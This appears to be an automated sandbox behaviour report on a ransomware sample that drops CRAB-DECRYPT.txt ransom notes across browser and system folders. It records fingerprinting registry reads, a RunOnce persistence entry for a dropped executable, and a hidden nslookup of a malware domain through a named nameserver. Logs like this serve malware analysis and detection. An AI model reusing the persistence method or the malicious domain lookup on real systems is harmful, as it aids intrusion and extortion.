Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\https_www.google.com_0.indexeddb.leveldb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\https_www.youtube.com_0.localstorage desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\CacheStorage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\Database\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\Database\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\ScriptCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\_crx_aohghmighlieiainnegkcijnfilokake\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\EVWhitelist\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Safe Browsing\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SwReporter\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012018031420180315\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Event Viewer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\3Y244KAF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ASF6K8JF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\M2CKLQNS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Nd9E1FYi\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Feeds Cache\ZH5Q7INF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
For performance reasons, the remaining 810 entries are omitted.
The remaining entries can be found in glog.xml.
Registry (28)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters - True 1
Fn
Open Key HKEY_CURRENT_USER\Control Panel\International - True 1
Fn
Open Key HKEY_CURRENT_USER\Keyboard Layout\Preload - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters value_name = Domain, data = 0 True 1
Fn
Read Value HKEY_CURRENT_USER\Control Panel\International value_name = LocaleName, data = 101 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 1, data = 48 True 1
Fn
Read Value HKEY_CURRENT_USER\Keyboard Layout\Preload value_name = 2, data = 48 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = productName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = ProcessorNameString, data = 73 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 value_name = Identifier, data = 73 True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce value_name = wyzftwkvewc, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ True 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create nslookup politiaromana.bit ns1.virmach.ru os_pid = 0xd48, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
Module (1681)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x74120000 True 3
Fn
Load KERNEL32.dll base_address = 0x74120000 True 2
Fn
Load msvcr100.dll base_address = 0x6f970000 True 1
Fn
Load USER32.dll base_address = 0x76840000 True 1
Fn
Load GDI32.dll base_address = 0x764e0000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76dc0000 True 1
Fn
Load SHELL32.dll base_address = 0x750e0000 True 1
Fn
Load CRYPT32.dll base_address = 0x74c50000 True 1
Fn
Load WININET.dll base_address = 0x6fdc0000 True 1
Fn
Load PSAPI.DLL base_address = 0x74560000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74120000 True 12
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x76e90000 True 5
Fn
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76dc0000 True 701
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x7413a980 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x74137570 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x74139e30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x74144ff0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x76eef730 True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x76eed830 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x74139950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x74137a50 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x74144bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x74137810 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x74137600 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x7413a700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x74145100 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x74147b30 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x74138bf0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x74137990 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x76ef7a80 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x74133870 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x74146630 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x74147020 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x74146c50 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x74162430 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x7413ab60 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x74132af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x74131b90 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x7413a2b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x741378b0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x74132ad0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x74133880 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x74137710 True 2
